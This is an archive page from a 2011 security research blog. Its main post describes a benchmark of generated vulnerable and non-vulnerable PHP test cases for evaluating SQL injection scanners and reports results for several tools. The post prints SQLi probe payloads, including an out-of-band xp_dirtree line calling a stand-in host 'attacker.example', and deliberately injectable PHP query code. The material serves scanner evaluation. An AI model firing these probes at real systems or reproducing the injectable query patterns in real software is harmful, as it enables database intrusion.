Friday, August 19, 2011

Building a benchmark for SQL injection scanners

Intro

In the last couple of years we have seen a lot of emerging projects aimed at automating web application vulnerability analysis. That's right, I mean security scanners. Just to name a few: w3af, skipfish, Grendel-Scan, arachni, wapiti, SecuBat, sqlmap, hexjector, SQLiX and many more.

I like to group security scanners according to their feature sets:
  • general-purpose vs special-purpose (testing for SQLi or XSS only);
  • detection only vs detection + exploitation.
Naturally, several good questions arise:
  1. Is it true that special-purpose tools perform better than general-purpose ones?
  2. Is it true that commercial tools perform better than free ones?
  3. Is it possible to find an ultimate champion for a certain vulnerability class (e.g. SQLi)? If not, which tools would produce the best result when combined?
Our goal was to answer these questions for a specific class of web application vulnerabilities, namely SQLi. The scope:
  1. We are not interested in second-order SQLi vulnerabilities. Reason: there are no feasible techniques to detect second-order SQLi in a black-box setting.
  2. We are not interested in crawling capabilities of the scanners.
  3. We are not interested in measuring exploitation capabilities.
In order to answer these questions we created a benchmark - a comprehensive set of vulnerable and non-vulnerable test cases - and tested several scanners against it.
This is the point where you should ask:
- "Why the hell should I care? There have been a lot of similar efforts. Do you provide a proof that your test set is complete, or something?"

In fact, yes. Our approach is not ad hoc. Let's take a look at it.
First of all, we will outline the capabilities of the existing SQLi detection techniques. After that we will proceed to a discussion of the problems that arise during automation. Finally, we will present our approach to benchmarking SQLi scanners.

Existing techniques for SQLi detection are not complete!

A black-box scanner has only a few information channels on which to base its decisions about the presence or absence of vulnerabilities:
  • HTTP status code;
  • HTTP headers (e.g. Location, Set-Cookie, etc.);
  • HTTP body;
  • HTTP response delay;
  • out-of-band channels.

By definition, an SQLi vulnerability is the possibility to alter the syntactic structure of an SQL statement. The main idea behind the existing black-box SQLi detection techniques is to inject exactly those statements which, when evaluated by the back-end, produce a change measurable from the outside (an altered status code or response body, a delay, an issued DNS request, etc.).
To sum things up, the community has come up with several SQLi detection techniques (illustrative probe payloads are sketched right after the list):
  • error-based;
  • content-based (or blind);
  • time-based;
  • out-of-band.
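
To give a feel for the difference between these techniques, here is a minimal sketch of probe payloads a scanner might send for each of them. The payloads, their placement inside a quoted string parameter, and the DBMS assumptions (MySQL for SLEEP, MSSQL for the out-of-band example) are illustrative only, not an exhaustive or authoritative list.

// illustrative probe payloads per detection technique (assumed to land inside a quoted string parameter)
$probes = array(
    'error-based'   => "'",                                    // a lone quote: provokes a DBMS error message in the response
    'content-based' => array("' AND '1'='1", "' AND '1'='2"),  // blind: compare the two responses for a difference
    'time-based'    => "' AND SLEEP(5)-- -",                   // MySQL 5.0.12+: measurable response delay
    'out-of-band'   => "'; EXEC master..xp_dirtree '\\\\attacker.example\\x'-- -", // MSSQL: triggers a DNS/SMB lookup
);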

Alas, this set is not complete. Consider a code snippet which extracts the User-Agent value from an HTTP request and stores it in the back-end DBMS without validation:
$ua = $_SERVER["HTTP_USER_AGENT"];
// the value is embedded into the query without any validation or escaping
$rs = mysql_query("SELECT id FROM user_agents WHERE user_agent = '" . $ua . "'");
$num_rows = mysql_num_rows($rs);
if ($num_rows == 0) {
    // insert $ua into the database
}

Furthermore, suppose that all possible exceptions are caught and suppressed, and that the DBMS does not support functions like sleep (MS Access, for instance). [Forget about heavy queries too ;)] This means that from the outside we can influence neither the response itself nor the response delay. Yet this may well be an exploitable vulnerability (e.g. consider web-shell installation).
Now that we know there are certain SQLi instances which cannot be detected by the existing techniques in general, it is time to survey the potential for their automation.

Automation challenges

SQLi scanner developers face two main challenges:
  1. An injected input should leave the whole query syntactically correct. Thus, a scanner should somehow infer the injection point (e.g. tell the difference between an injection into a column name in a SELECT statement and an injection after the LIMIT keyword).
  2. A page comparison algorithm should tell a "true" page from a "false" page when doing blind SQLi. This is an easy task for a human, and almost impossible in the general case for a machine. Modern web applications may have an irregular page structure and produce different content in response to identical HTTP requests (ads, social widgets, etc.), which makes the situation even worse (a naive comparison heuristic is sketched below).
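
To make the second challenge concrete, here is a minimal sketch of the kind of naive page comparison a blind-SQLi check might fall back on. The normalization steps and the similarity threshold are assumptions for illustration, not a description of any particular scanner.

// Naive blind-SQLi page comparison: strip the obviously volatile parts,
// then measure textual similarity between the "true" and "false" responses.
function normalize_page($html) {
    $html = preg_replace('/<script\b.*?<\/script>/is', '', $html); // drop inline JS (ads, widgets)
    $html = preg_replace('/<!--.*?-->/s', '', $html);              // drop comments (timestamps, request ids)
    return preg_replace('/\s+/', ' ', strip_tags($html));          // keep plain text only
}

function pages_differ($page_true, $page_false, $threshold = 98.0) {
    similar_text(normalize_page($page_true), normalize_page($page_false), $percent);
    return $percent < $threshold; // below the threshold => treat the pages as different
}

On unstable pages (see criterion №11 below) such a heuristic quickly breaks down, which is exactly what part of the benchmark is designed to expose.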

Our approach

The idea behind our approach is to establish a classification of all possible implementations of a single web application module that interacts with a database. After that we would be able to produce all possible modules (or scripts, if you like), which would make up the test set. Why do we need a classification anyway? Well, to reason about test set completeness, of course.

At the current level of abstraction we define five steps which typically constitute a common web application module:
  1. Get user input.
  2. Validate user input.
  3. Construct a query.
  4. Perform a query and handle the result.
  5. Construct and issue an HTTP response.

We then took a closer look at each step and enumerated all possible ways to implement it.
Here's what we got.

Classification of environments

Criterion №1: DBMS and version.
Classes: all possible DBMSes and versions.
Reason: the feature set of an SQL dialect is determined by the DBMS version. Almost every major DBMS release ships with new built-in functions, which can be used in SQLi attack vectors.
Current implementation: supports only MySQL 5.0.

Criterion №2: exception suppression settings.
Classes: exceptions suppressed, exceptions not suppressed.
Comment: this is an environment setting; thus it does not relate to a possible try-catch block in a module.
Reason: this criterion allows us to assess the implementation of the error-based technique.
Current implementation: via the PHP display_errors setting.
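
As a rough illustration (the generator may well toggle the setting differently, e.g. per virtual host), the two classes boil down to the value of display_errors in effect for a test case:

ini_set('display_errors', '0'); // exceptions suppressed: nothing about a failed query reaches the response
ini_set('display_errors', '1'); // exceptions not suppressed: PHP warnings and echoed DBMS errors leak into the page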

Criterion №3: execution time limit settings.
Classes: limited to 1 second, unlimited.
Reason: this criterion allows us to check whether a scanner implements both the time-based and the blind SQLi detection techniques and is able to choose the correct one to use.
Current implementation: not implemented. Planned: the PHP max_execution_time setting.

Classification of the "Get user input" step

Criterion №4: location of the payload.
Classes: GET-parameter name, GET-parameter value, URL path component, POST-parameter name, POST-parameter value, cookie parameter name, cookie parameter value, header name, header value.
Reason: a scanner should be capable of injecting payloads not only into GET and POST parameters, but into cookies and other headers as well.
Current implementation: only one GET parameter is used to obtain user input (a sketch of possible payload sources follows).
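
A sketch of where a payload may come from; only the GET-parameter value is used in the current implementation, and the parameter and header names below are purely illustrative:

// possible sources of attacker-controlled input, one per class of this criterion
$sources = array(
    'GET-parameter value'    => isset($_GET['id']) ? $_GET['id'] : null,
    'POST-parameter value'   => isset($_POST['id']) ? $_POST['id'] : null,
    'cookie parameter value' => isset($_COOKIE['ref']) ? $_COOKIE['ref'] : null,
    'header value'           => isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : null,
);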

Classification of the "Validate user input" step

Criterion №5: maximum length enforcement.
Classes: user-defined length limit, unlimited length.
Reason: a scanner should strive to make its probe vectors as short as possible.
Current implementation: the test bench operator can alter this limit; by default it is set to 32.

Criterion №6: sanitization approach.
Classes:
proper escaping (prepared statement or built-in escaping function);
improper usage of built-in escaping facilities;
manual escaping:
- of single quotes;
- of double quotes;
- of slashes;
manual removal:
- of single quotes;
- of double quotes;
- of slashes;
- of SQL whitespaces;
- of SQL delimiters;
- of SQL keywords;
manual regexp-like check with error generation:
- of single quotes;
- of double quotes;
- of slashes;
- of SQL whitespaces;
- of SQL delimiters;
- of SQL keywords.
In fact, to obtain all classes from the latter three groups (manual handling) we should take all permutations of them.
Reason: a perfect scanner should be able to bypass any flawed input validation.
Current implementation: proper escaping (mysql_real_escape_string inside quotes), improper usage of built-in escaping facilities (mysql_real_escape_string for numbers), manual escaping of single quotes, manual escaping of double quotes, manual escaping of all quotes, manual removal of all quotes, manual removal of SQL whitespaces.
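
As an illustration of the "improper usage of built-in escaping facilities" class (assuming an established MySQL connection; the table and parameter names are made up for the example), escaping a value that is used in a numeric context, without quoting it, leaves the query injectable:

// mysql_real_escape_string() only escapes quotes, backslashes and a few control characters;
// a numeric context has no quotes to break out of, so a payload like "1 OR 1=1" passes through intact.
$id = mysql_real_escape_string($_GET['id']);
$rs = mysql_query("SELECT title FROM news WHERE id = " . $id);         // still injectable
// counterpart from the "proper escaping" class: escape AND quote the value
$rs = mysql_query("SELECT title FROM news WHERE id = '" . $id . "'");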

Classification of the "Construct a query" step

Criterion №7: injection point.
Classes: all possible injection points according to DBMS documentation.
Reason: a perfect scanner should be able to detect SQLi in all query types.
Current implementation (one of the ORDER BY cases is sketched after this list):
- after the SELECT keyword, in the field list:
  - inside/without backquotes;
  - inside brackets (nesting levels: 1, 2, 3);
  - as the last or a middle (including the first) argument of an SQL function;
- in the WHERE clause:
  - in a string/numeric literal;
  - inside brackets (nesting levels: 1, 2, 3);
  - in the left/right part of a condition ($id=id vs id=$id);
  - as the last or a middle (including the first) argument of an SQL function;
- after ORDER BY/GROUP BY, in the field name:
  - inside/without backquotes;
- after ORDER BY/GROUP BY, in an expression (ORDER BY `price` * $discount, …):
  - in a string/numeric literal;
  - inside brackets (nesting levels: 1, 2, 3);
  - as the last or a middle (including the first) argument of an SQL function;
- after ORDER BY/GROUP BY, in the sort order ASC/DESC (ORDER BY `price` $style).
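
For instance, the "string argument of an SQL function after ORDER BY" case could be implemented along these lines (a sketch assuming an established MySQL connection; the table, column and function choices are illustrative, not the generator's actual code):

// the payload lands inside a string literal that is the first argument of a built-in function in ORDER BY
$sort = $_GET['id'];
$rs = mysql_query("SELECT id, name FROM goods ORDER BY IFNULL('" . $sort . "', name)");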

Classification of the "Perform a query and handle the result" step

Criterion №8: expected result.
Classes: result is not expected (DML queries), one field expected, one row expected, multiple rows expected.
Reason: the expected result type influences how a scanner should detect a potential SQLi. For example, if the query result is discarded, it is useless to alter the result set using boolean conditions (blind SQLi).
Current implementation: result is not expected (DML queries), one field expected, one row expected, multiple rows expected.
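
A minimal sketch of the "result is not expected" class: a DML query whose outcome never surfaces in the response (assuming an established MySQL connection; the table and column names are made up):

// the result set is discarded, so boolean-based (blind) probes have nothing to alter in the page;
// only errors, delays or out-of-band effects can reveal the injection
mysql_query("UPDATE stats SET visits = visits + 1 WHERE page = '" . $_GET['id'] . "'");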

Criterion №9: error handling.
Classes: an error results in a different page (no DBMS error message), an error results in a page with a DBMS error message, an error is suppressed silently.
Reason: a scanner should switch to the blind or the error-based technique accordingly.
Current implementation: implemented.
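
The three error-handling classes could be realized roughly as follows (a sketch assuming an established MySQL connection, not the generator's literal code):

$sql = "SELECT title FROM news WHERE id = " . $_GET['id']; // built as in the previous steps
$rs = mysql_query($sql);
// class 1: error results in a different page, without a DBMS error message
if (!$rs) { die("Something went wrong"); }
// class 2: error results in a page containing the DBMS error message
// if (!$rs) { die("Query failed: " . mysql_error()); }
// class 3: error is suppressed silently
// if (!$rs) { /* pretend nothing happened and render the usual page */ }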

Classification of the "Construct and issue an HTTP response" step

Criterion №10: which response part depends on the SQL result.
Classes: status code, header, text within the body, markup within the body.
Reason: a perfect scanner should detect changes caused by a successful injection in any part of the HTTP response.
Current implementation: Location header, text within body, markup within body.
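
For example, the "Location header" class can be sketched as a module whose only observable outcome is where the client gets redirected (assuming an established MySQL connection; the URLs and names are illustrative):

$rs = mysql_query("SELECT id FROM users WHERE token = '" . $_GET['id'] . "'");
if ($rs && mysql_num_rows($rs) > 0) {
    header("Location: /account.php"); // the query returned a row
} else {
    header("Location: /login.php");   // the query returned nothing (or failed)
}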

Criterion №11: response stability.
Classes: stable, unstable text, unstable initial DOM (before JS evaluation), unstable resulting DOM (after JS evaluation).
Reason: a perfect scanner should detect changes caused by a successful injection in any part of the HTTP response regardless of page stability (ads, social widgets, etc.).
Current implementation: stable, unstable text, unstable initial DOM.
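
The "unstable text" class can be emulated by appending a bit of pseudo-random content to every response, which is enough to confuse naive page diffing (a sketch; the actual test cases may use different noise):

// every response gets a unique marker and a randomly picked "ad" block
echo "<!-- request " . uniqid() . " -->";
$ads = array("Buy one, get one free!", "Hot summer sale", "New arrivals every day");
echo "<div class=\"ad\">" . $ads[array_rand($ads)] . "</div>";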

The resulting test set is the complete set of combinations of these classes. For example, among others there is a test case with the following combination (a sketch of such a test case follows the list):
C1: MySQL 5.0 backend;
C2: suppressed exceptions;
C3: unlimited execution time;
C4: a test module would get input from the GET parameter value;
C5: without maximum length enforcement;
C6: with improper used mysql_real_escape_string (for numbers);
C7: as the first string argument of a built-in function after the ORDER BY keyword;
C8: one row would be expected;
C9: errors are silently suppressed;
C10: a query result determines a redirection destination (i.e. the value of the Location header);
C11: the response (a redirection) is stable except for the Date header.
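
A test case generated for this particular combination might look roughly like this. The file layout, credentials, table and column names, and the exact query are illustrative assumptions, not the generator's actual output:

// C2: exceptions suppressed
ini_set('display_errors', '0');

// C1: MySQL 5.0 back-end (connection details are illustrative)
mysql_connect('localhost', 'bench', 'bench');
mysql_select_db('benchmark');

// C4/C5: input comes from a GET-parameter value, with no length limit enforced
$sort = isset($_GET['id']) ? $_GET['id'] : '';

// C6: built-in escaping applied as if the value were a number (it is not quoted below)
$sort = mysql_real_escape_string($sort);

// C7: injection as the first argument of a built-in function after ORDER BY
// C9: errors are silently suppressed with @
$rs = @mysql_query("SELECT token FROM items ORDER BY IFNULL(" . $sort . ", id) LIMIT 1");

// C8: one row expected; C10: the result only decides the Location header
if ($rs && ($row = mysql_fetch_assoc($rs))) {
    header('Location: /view.php?token=' . urlencode($row['token']));
} else {
    header('Location: /notfound.php');
}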

Implementation

We have implemented our test bench as a virtual machine containing a web server, a PHP interpreter, the test generator, and the result analyzer. It can be downloaded from here.
Currently the generator creates 27680 test cases (both vulnerable and non-vulnerable). A test case is a PHP file which receives one GET parameter. There is also an index file, which links to all test cases; this index file serves as the starting point for scanners (a possible shape of such an index is sketched below).
We have also implemented wrappers for several scanners: sqlmap, skipfish, wapiti, w3af. Together with a specially designed scheduler, these wrappers allowed us to run several scanner instances in parallel from the VM's localhost.
Please refer to the README files inside the archive for further information about the environment and its usage.
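
For illustration, an index file of this kind could be generated along the following lines. The directory layout, file naming and the id parameter are assumptions made for the sketch, not the actual generator output:

// emit one link per generated test case so that a scanner pointed at the index reaches every case
foreach (glob(dirname(__FILE__) . '/cases/*.php') as $case) {
    $name = basename($case);
    echo '<a href="cases/' . htmlspecialchars($name) . '?id=1">' . htmlspecialchars($name) . "</a><br>\n";
}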

Evaluation

Here's just a small portion of the overall table.
                  Positives      False positives     Positives with        False positives with
                  (vulnerable)   (not vulnerable)    unstable response     unstable response
Total             16224          11456               2016                  840
sqlmap 0.8        11128          229                 576                   229
skipfish 1.81b    10937          37                  82                    37
wapiti 2.2.1      11151          58                  1344                  3
acunetix          7395           0                   1003                  0
w3af 1.0-rc5      13316          198                 1572                  126

Comments on the numbers:
  • The scores are not normalized; thus, it is not correct to declare the scanner with the highest score the best one. For example, most of the test cases are ones with unsuppressed errors, so a scanner that performs best with the error-based SQLi detection technique has a better chance of getting the highest overall score. This is the case with Wapiti.
  • The main feature of our test bench is that it allows computing scores for custom classes of test cases once a scanner has completed a run. For example, you could define a class "blind SQLi after the ORDER BY keyword" and re-compute the results for that class alone. For the time being I have refrained from digging into the interpretation of more granular classes of test cases.

Just a few facts.
Sqlmap 0.8:
- does not detect SQLi with output into HTTP headers;
- lacks intelligence when dealing with unstable output;
- fails on tests with SQLi into table fields surrounded by backquotes.

Skipfish 1.81b:
- does not detect SQLi with output into HTTP headers;
- lacks intelligence when dealing with unstable output;
- low false positive rate.

Wapiti 2.2.1:
- only error-based and time-based techniques are implemented;
- fails on tests with SQLi into table fields surrounded by backquotes;
- fails on tests with SQLi inside nested brackets.

Acunetix 7.0.0:
- zero false positives;
- often fails to detect SQLi with output into HTTP headers;
- often fails to detect time-based SQLi even when the injection was successful;
- not so good with non-error-based techniques.

w3af 1.0-rc5:
- best implementation of error-based technique;
- often fails if the normal query returns zero rows (as with login pages).

Outro

More analytics in a few weeks.
Care to contribute to extending the test classes? YOU ARE WELCOME! Contact us! There's so much to be done!

Side note #1: one of the most comprehensive surveys is the one made by Shay Chen. If you haven't checked it out yet, you should!

Credits:
Karim Valiev - implementation of benchmark environment, classification.
Andrew Petukhov - main idea and classification.

Monday, July 25, 2011

Detecting Insufficient Access Control in Web Applications

Two weeks ago we attended the 1st SysSec Workshop and the DIMVA conference in Amsterdam. We presented our paper entitled "Detecting Insufficient Access Control in Web Applications" there. We were surprised to see so many people at the workshop (as far as I could tell, the workshop drew a larger audience than DIMVA itself!).
Well, great events and great people. Many thanks go to the organizers, especially to Herbert Bos, who made this event happen.

Here is some of the material we prepared for the workshop:
- A presentation:
It can be downloaded here.

- A paper "Detecting Insufficient Access Control in Web Applications".

- Source code of our tool is available for checkout at Google Code.

Thursday, June 2, 2011

The 1st SysSec Workshop

Our paper "Detecting Insufficient Access Control in Web Applications" was accepted for the First SysSec Workshop.

This work is follow-up research based on the OWASP Access Control Rules Tester project, which was initiated during the OWASP Summer of Code 2008.

If any of you guys happen to attend DIMVA'11 in Amsterdam, I'd be very glad to meet for a beer :)

Acknowledgements. I'd like to thank George Noseevich, who has put so much effort into this project and this paper.

Saturday, April 9, 2011

Comments on the talk made by Rafal Los (HP) about business logic flaws at Blackhat

Recently I stumbled upon a talk on business logic vulnerabilities (whitepaper available here) given by Rafal Los at BlackHat Europe. Being personally interested in the topic, I decided to share my (rather critical) thoughts on the subject. I have divided them into two categories.

Inaccuracies in wording and definitions.
1. The definition of business logic flaw is too general to be useful.
"A defect that exposes the component business processes or component flows to manipulation from the attacker perspective to achieve unintended and undesirable consequences from the design perspective; without disrupting the general function or continuity of the application."
Well, almost every application uses so-called internal state to carry out its operations. In general, every web application workflow is a sequence of computational steps. Each computational step can be guarded by a predicate on the internal state. Hence, modification of the internal state can alter a web application workflow by enabling some computational steps or disabling others within it. Thus, every flaw in a web application that can be used to alter its internal state may lead to attacks satisfying the definition presented by Rafal. SQL injection is the best example here.

2. 'Taxonomy' is the wrong word.
The confusion starts at the point where Rafal introduces the term "taxonomy". Talking about taxonomies is dangerous: one has to prove the properties of the proposed taxonomy, or at least try to. Rafal introduces a taxonomy of business logic flaws which consists of two classes. Neither the criteria used to create those classes nor a classification procedure is provided.
Moreover, Rafal mixes several terms: a vulnerability (an enabling property of software that makes a successful attack possible), an attack (one of the possible manifestations of an exploitable flaw) and the goal of an attack (what an attacker wishes to achieve). The same goal can be achieved through different vulns; a single vuln can be exploited for different goals. Rafal ties the first class of business logic flaws to "privilege manipulation", which is a goal. IMO this is the wrong approach: this goal can be achieved through different attacks (and underlying vulns): SQLi (login bypass through injection), forceful browsing or even server misconfiguration. How do these relate to business logic?
The same applies to the second class, which is "Transaction Control Manipulation".
Finally, the OWASP Top 10 is not a taxonomy and was never meant to be. It is just an ordered list.

Doubts related to the proposed ideas
A method intended to find business logic flaws should operate in terms of the business domain and the application logic. Hence, the first problem to be solved is mapping the set of possible interactions with a web application into use cases (which would be the basis for further analysis). It is not possible to automate this step without a specification (not to mention technical issues like form submissions and CAPTCHAs).
Ok, let's suppose we have solved the first problem. The second question is: how does the proposed approach differ from known QA methods like fault injection, test mutations, etc.? Could you point out the added value of the proposed approach?

Final words
Finally, I'd like to point out previous research in the area, which Rafal did not mention in his whitepaper:
- Differential analysis and its variants. This technique has been described in several sources [1], [2], [3] and was designed for finding improper access control implementations. This means that, from the methodological point of view, the problem of detecting improper access control is already solved. Btw, some of these ideas were implemented in IBM AppScan, AFAIK.
- "Toward Automated Detection of Logic Vulnerabilities in Web Applications". A good example of how business logic flaws could be formalized. Not a black-box approach though.
- "Multi-Module Vulnerability Analysis of Web-based Applications". An example of how a notion of "intended workflow" could be formalized. Not a black-box approach though.

References
[1] J. Scambray and M. Shema, Hacking exposed: Web applications. McGraw-Hill Osborne Media, 2002.
[2] O. Segal, “Automated testing of privilege escalation in web applications,” Watchfire, 2006.
[3] D. Stuttard and M. Pinto, The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws. Wiley Publishing, 2007.

Sunday, February 27, 2011

ruCTF'2011 Quals

Well, our CTF team Bushwhackers took first place in the ruCTF'2011 Qualification game. I'd like to congratulate all the team members on this victory. Wishing us the same luck in the Final.

I'd also like to thank the organization team for their efforts.

Here's some evidence of our team at work:

Sunday, January 23, 2011

Web application scanner comparison efforts

It's been three months since we started a project which aims at benchmarking SQLi scanners. Although the project is far from finished, I've decided to share articles and posts by other researchers who have undertaken similar efforts. The publications are sorted in order of appearance.
  1. Andreas Wiegenstein, Frederik Weidemann, Dr. Markus Schumacher, Sebastian Schinzel. Web Application Vulnerability Scanners – a Benchmark. Published in October 2006.

  2. Larry Suto. Analyzing the Effectiveness and Coverage of Web Application Security Scanners. Published in October 2007. And responses to it by Ory Segal (IBM) and by Jeff Forristal (HP).

  3. Anantasec. Web Application Scanners Comparison. Published in January 2009.

  4. Larry Suto. Analyzing the Accuracy and Time Costs of Web Application Security Scanners. And responses to it by Acunetix, NT Objectives, Jeremiah Grossman and HP. Published in February 2010.

  5. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell. State of the Art: Automated Black-Box Web Application Vulnerability Testing. Published in May 2010.

  6. Adam Doupe, Marco Cova, and Giovanni Vigna. Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners. Published in July 2010.

  7. Shay Chen. Web Application Scanners Accuracy Assessment. Published in December 2010.

Out of the list, but still related work.

Wednesday, January 5, 2011

Deutsche Post Security Cup

Recently our team Bushwhackers participated in the Deutsche Post Security Cup.

The Cup results are as follows:
- first place went to the RUB team from Ruhr University Bochum, led by the famous Mario Heiderich (see also the FluxFingers team); I recommend checking out a site created and maintained by him: http://html5sec.org/. Congratulations! Good job, guys!
- we took second place;
- third place went to the UK Hax team.

I would like to thank the Security Cup organization team, including (but not limited to) Karsten Nohl, Ralph Zwierzina, and personally Sascha May. Great job! See you in Moscow ;)